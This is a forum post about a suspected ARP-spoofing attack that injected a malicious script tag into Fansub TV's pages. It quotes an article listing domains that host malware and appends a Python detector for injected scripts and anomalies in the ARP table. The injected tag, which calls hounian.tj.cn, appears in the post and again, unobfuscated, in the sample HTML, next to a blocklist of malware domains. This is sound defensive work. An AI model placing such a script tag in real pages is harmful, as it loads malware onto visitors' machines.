ARP spoofing attack on Fansub TV's network?

NinjaDuck-chi
The last few days I've only been getting half a page of garbage text most times when trying to access Fansub TV. When looking at the source code, a suspicious command precedes the gobbledegook:

CODE <skript src=http://hounian.tj.cn/count/js/gif.gif></skript>

(I misspelled 'script' on purpose here to prevent accidental parsing)

When checking my cache the "gif" is really some script to (amongst other things) launch one of two Flash programs. I initially wondered if this was just a poor choice of advertisement provider, but then found the following story when googling the dodgy-looking .cn site name.

--
http://windowsitpro.com/article/articleid/...s-underway.html

June 03, 2008
ARP Spoofing Attacks Underway

It seems that there's a barrage of ARP spoofing attacks taking place on various networks. In some cases the attacks eventually lead to installation of malware, in other cases the attacks make it appear that a site was hacked when in reality it was not.

Earlier this week the network hosting metasploit.com came under such an attack. Today one of my customers fell victim to the same sort of attack when their hosting company was attacked with ARP spoofing.

In the latter case traffic was redirected to sites in China that host malware. After a little research I discovered that others are experiencing similar situations.

So if your sites appear to become victims of similar attacks get your hosting company to check into their ARP tables. Also, consider blacklisting these domains since they are sometimes the places used to host malware in these particular attacks - at the moment anyway:

crazysb.cn
hounian.tj.cn
51yes.com
--

I found several files cached from hounian and 51yes after my latest Fansub TV redirection, including a couple that'd had great pains taken to obfuscate their source code from casual observation or scanner heuristics. (A simple matter to reconstruct the true source code, because their unscramble algorithm is plainly visible.)
I think I might also check the "gobbledegook" of the redirect page in a hex editor tomorrow and see if it contains a gzip header or something. In the meantime you might want to fire up your favourite malware scanner and do a full system check...

Have fun and mung beans,
Luv Duck
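Two host-side checks for what the post and the quoted article describe, written as an added example (this is not code from the original post, the article, or Fansub TV): one scans a fetched page for script tags loading from the article's three blocklisted domains, the other reads `ip neigh` output and flags the two classic ARP-spoofing signs, a gateway whose MAC no longer matches a trusted baseline and one MAC answering for several IPs. The sample HTML, neighbour-table lines and baseline MAC are constructed for the example.

```python
"""Added example: detect an injected <script src=...> from a blocklisted host,
and spot ARP-table anomalies that indicate ARP spoofing on the local segment.
All sample data below is constructed; the blocklist is the one quoted in the
windowsitpro article."""
import re
from urllib.parse import urlsplit

# Domains quoted in the article.  A host matches if it equals one of these
# or is a subdomain of one (e.g. x.51yes.com).
BLOCKLIST = {"crazysb.cn", "hounian.tj.cn", "51yes.com"}

# <script ... src=VALUE>, where VALUE may be double-quoted, single-quoted or
# bare (the injected tag in the post used a bare, unquoted URL).
_SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)


def _host_matches(host, blocklist):
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocklist)


def find_injected_scripts(html, blocklist=BLOCKLIST):
    """Return the src URLs of <script> tags that load from a blocklisted host."""
    hits = []
    for m in _SCRIPT_SRC.finditer(html):
        src = next(g for g in m.groups() if g is not None)
        host = urlsplit(src).hostname  # handles http://, https:// and //host/ forms
        if host and _host_matches(host, blocklist):
            hits.append(src)
    return hits


# Parses lines from `ip neigh show`, e.g.
#   192.168.1.1 dev eth0 lladdr 00:11:22:33:44:55 REACHABLE
# Entries without an lladdr (FAILED/INCOMPLETE) carry no MAC and are skipped.
_NEIGH = re.compile(r"^(\S+)\s+dev\s+\S+\s+lladdr\s+([0-9a-f:]{17})", re.I)


def parse_ip_neigh(lines):
    """Map IP -> lowercase MAC from `ip neigh` output lines."""
    table = {}
    for line in lines:
        m = _NEIGH.match(line.strip())
        if m:
            table[m.group(1)] = m.group(2).lower()
    return table


def find_arp_anomalies(table, baseline):
    """Flag (1) IPs whose MAC differs from a trusted baseline (e.g. the gateway
    MAC recorded on a known-good day) and (2) one MAC claiming several IPs.
    (2) is also seen legitimately on multi-homed routers, so treat it as a
    lead to investigate rather than proof of an attack."""
    anomalies = []
    for ip, mac in table.items():
        expected = baseline.get(ip)
        if expected and expected.lower() != mac:
            anomalies.append(f"{ip}: MAC changed {expected} -> {mac}")
    by_mac = {}
    for ip, mac in table.items():
        by_mac.setdefault(mac, []).append(ip)
    for mac, ips in by_mac.items():
        if len(ips) > 1:
            anomalies.append(f"{mac} claims {len(ips)} IPs: {', '.join(sorted(ips))}")
    return anomalies


# --- constructed sample data ------------------------------------------------
SAMPLE_HTML = (
    "<html><head><title>Fansub TV</title>"
    "<script src=http://hounian.tj.cn/count/js/gif.gif></script>"
    '<script src="https://cdn.example.net/app.js"></script>'
    "</head><body>...</body></html>"
)
SAMPLE_NEIGH = [
    "192.168.1.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE",  # gateway, now an unexpected MAC
    "192.168.1.20 dev eth0 lladdr aa:bb:cc:dd:ee:ff STALE",     # same MAC on another IP
    "192.168.1.21 dev eth0 lladdr 11:22:33:44:55:66 REACHABLE",
    "192.168.1.30 dev eth0  FAILED",
]
BASELINE = {"192.168.1.1": "00:11:22:33:44:55"}  # assumed known-good gateway MAC

if __name__ == "__main__":
    for src in find_injected_scripts(SAMPLE_HTML):
        print("injected script:", src)
    for a in find_arp_anomalies(parse_ip_neigh(SAMPLE_NEIGH), BASELINE):
        print("ARP anomaly:", a)
```

On a real host, feed `find_injected_scripts` the raw bytes you fetched (decoded) rather than the rendered DOM, so the injected tag is seen before any browser-side rewriting, and take the `ip neigh show` lines from a machine on the affected segment, since a web server's ARP table on the hosting network is where the article's advice applies, not the visitor's.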

Mod's note: Thank you very much for the info.
The admin has been alerted to it.